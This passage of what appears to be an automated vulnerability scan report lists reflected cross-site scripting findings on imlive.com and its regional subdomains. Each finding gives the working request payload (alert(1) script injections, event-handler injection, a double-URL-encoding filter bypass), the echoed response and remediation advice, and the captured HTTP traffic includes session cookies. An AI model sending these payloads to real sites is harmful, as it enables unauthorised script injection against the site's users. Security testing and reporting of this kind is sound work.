Cookie: ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; BIGipServerImlive=2417231426.20480.0000; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; __utmb=71081352.4.10.1296223202

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:17:20 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 22109


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/webcam-login/?f2bef"><a>297c1fbe51b=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.143. http://imlive.com/webcam-sign-up/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /webcam-sign-up/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80602"><a>69f3ca0322b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webcam-sign-up/?80602"><a>69f3ca0322b=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:48 GMT
Connection: close
Content-Length: 41134
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/webcam-sign-up/?80602"><a>69f3ca0322b=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.144. http://imlive.com/webcam-sign-up/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /webcam-sign-up/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bdfe'-alert(1)-'167f160a9b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webcam-sign-up/?5bdfe'-alert(1)-'167f160a9b3=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:49 GMT
Connection: close
Content-Length: 41283
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/user.aspx&he=imlive.com&ul=/webcam-sign-up/?5bdfe'-alert(1)-'167f160a9b3=1&qs=5bdfe'-alert(1)-'167f160a9b3=1&qs=5bdfe'-alert(1)-'167f160a9b3=1&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function
...[SNIP]...

2.145. http://imlive.com/wmaster.ashx [gotopage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /wmaster.ashx

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 244f6%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7358040fd9f was submitted in the gotopage parameter. This input was echoed as 244f6'><script>alert(1)</script>7358040fd9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /wmaster.ashx?WID=124669500825&LinkID=701&gotopage=homepagems3.asp244f6%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7358040fd9f&waron=yes&promocode=YZSUSA5583 HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:04:48 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: imlv=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyLRxWQc0aKAUPIcMr1z98%2F8hVk8Zl52g6XTc8ahIm5wd6Dpvk1%2Ff8Hrm5IPl4A2Xrmhuo0zzjA78ETPbWo0pNpB; path=/
Set-Cookie: ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; path=/
X-Powered-By: vsrv47
Date: Fri, 28 Jan 2011 14:04:49 GMT
Set-Cookie: BIGipServerImlive=2366899778.20480.0000; path=/
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 8350


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
alytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/homepagems3.asp244f6%27%3e%3cscript%3ealert%281%29%3c%2fscript%3e7358040fd9f&lr=1107816005&ud=0&pe=404.asp&qs=404;http://imlive.com:80/homepagems3.asp244f6'><script>alert(1)</script>7358040fd9f&sr=0&iy=dallas&id=44&iu=1' height='1' width='1'>
...[SNIP]...

2.146. http://in.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://in.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76f4b'-alert(1)-'bf4b062c8a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?76f4b'-alert(1)-'bf4b062c8a0=1 HTTP/1.1
Host: in.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=oqywnfmllyyd1xzaovvpmu2g; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=oqywnfmllyyd1xzaovvpmu2g; path=/; HttpOnly
Set-Cookie: spvdr=vd=ad80ea2b-9f30-4fa6-87d5-ff9831af5170&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:36 GMT; path=/
Set-Cookie: iin=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:24:35 GMT
Connection: close
Content-Length: 21709
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="hi-IN" lang="hi-IN" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=in.imlive.com&ul=/?76f4b'-alert(1)-'bf4b062c8a0=1&qs=76f4b'-alert(1)-'bf4b062c8a0=1&qs=76f4b'-alert(1)-'bf4b062c8a0=1&iy=dallas&id=44&iu=1&vd=ad80ea2b-9f30-4fa6-87d5-ff9831af5170';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

2.147. http://in.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://in.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30418"><script>alert(1)</script>eb906244d97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?30418"><script>alert(1)</script>eb906244d97=1 HTTP/1.1
Host: in.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=p0jnew55vw3nxqrrsihsgjjf; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=p0jnew55vw3nxqrrsihsgjjf; path=/; HttpOnly
Set-Cookie: spvdr=vd=62454ef9-3278-4fa1-be68-74c4c836f2eb&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:36 GMT; path=/
Set-Cookie: iin=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:24:35 GMT
Connection: close
Content-Length: 22110
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="hi-IN" lang="hi-IN" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||30418"><script>alert(1)</script>eb906244d97~1');return false;">
...[SNIP]...

2.148. http://in.imlive.com/waccess/ [gotopage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://in.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload efac5'onerror%3d'alert(1)'f4ba4def511 was submitted in the gotopage parameter. This input was echoed as efac5'onerror='alert(1)'f4ba4def511 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=efac5'onerror%3d'alert(1)'f4ba4def511 HTTP/1.1
Host: in.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:24:50 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: iin=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQQSSTATD=NKPDBJMAFMLOCIAIEHIHPIKM; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:24:51 GMT
Connection: close
Content-Length: 8306
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=in.imlive.com&ul=/waccess/efac5'onerror='alert(1)'f4ba4def511/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://in.imlive.com:80/waccess/efac5'onerror='alert(1)'f4ba4def511/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

2.149. http://it.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://it.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e1c9"><a>8cb16e9fe00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?9e1c9"><a>8cb16e9fe00=1 HTTP/1.1
Host: it.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ccdifu55oarljg55lbciuw55; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=ccdifu55oarljg55lbciuw55; path=/; HttpOnly
Set-Cookie: spvdr=vd=c4be0621-1928-45cc-b3f3-18258a0d7a1f&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:50 GMT; path=/
Set-Cookie: iit=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:24:49 GMT
Connection: close
Content-Length: 18740
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it-IT" lang="it-IT" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||9e1c9"><a>8cb16e9fe00~1');return false;">
...[SNIP]...

2.150. http://it.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46421'-alert(1)-'4594a948ef4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?46421'-alert(1)-'4594a948ef4=1 HTTP/1.1
Host: it.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=idb51qqh31xv3x45cxo5dx45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=idb51qqh31xv3x45cxo5dx45; path=/; HttpOnly
Set-Cookie: spvdr=vd=a5fa461c-09b7-4606-8bf0-57b4f45b4d27&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:51 GMT; path=/
Set-Cookie: iit=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:24:51 GMT
Connection: close
Content-Length: 18915
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it-IT" lang="it-IT" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=it.imlive.com&ul=/?46421'-alert(1)-'4594a948ef4=1&qs=46421'-alert(1)-'4594a948ef4=1&qs=46421'-alert(1)-'4594a948ef4=1&iy=dallas&id=44&iu=1&vd=a5fa461c-09b7-4606-8bf0-57b4f45b4d27';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

2.151. http://it.imlive.com/waccess/ [gotopage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a32d9'onerror%3d'alert(1)'7223884f696 was submitted in the gotopage parameter. This input was echoed as a32d9'onerror='alert(1)'7223884f696 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=a32d9'onerror%3d'alert(1)'7223884f696 HTTP/1.1
Host: it.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:04 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: iit=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQSQSRBSD=HDONOIMAGIIFDHIHJOLHJHAN; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:04 GMT
Connection: close
Content-Length: 8305
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=it.imlive.com&ul=/waccess/a32d9'onerror='alert(1)'7223884f696/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://it.imlive.com:80/waccess/a32d9'onerror='alert(1)'7223884f696/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

2.152. http://jp.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jp.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2e62'-alert(1)-'e87ff225301 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?d2e62'-alert(1)-'e87ff225301=1 HTTP/1.1
Host: jp.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=htu2ck45js3iwfzirn2hch55; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=htu2ck45js3iwfzirn2hch55; path=/; HttpOnly
Set-Cookie: spvdr=vd=7a755e33-be6e-4c0d-be05-9c18484cccd6&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:04 GMT; path=/
Set-Cookie: ijp=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:03 GMT
Connection: close
Content-Length: 19890
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja-JP" lang="ja-JP" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=jp.imlive.com&ul=/?d2e62'-alert(1)-'e87ff225301=1&qs=d2e62'-alert(1)-'e87ff225301=1&qs=d2e62'-alert(1)-'e87ff225301=1&iy=dallas&id=44&iu=1&vd=7a755e33-be6e-4c0d-be05-9c18484cccd6';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

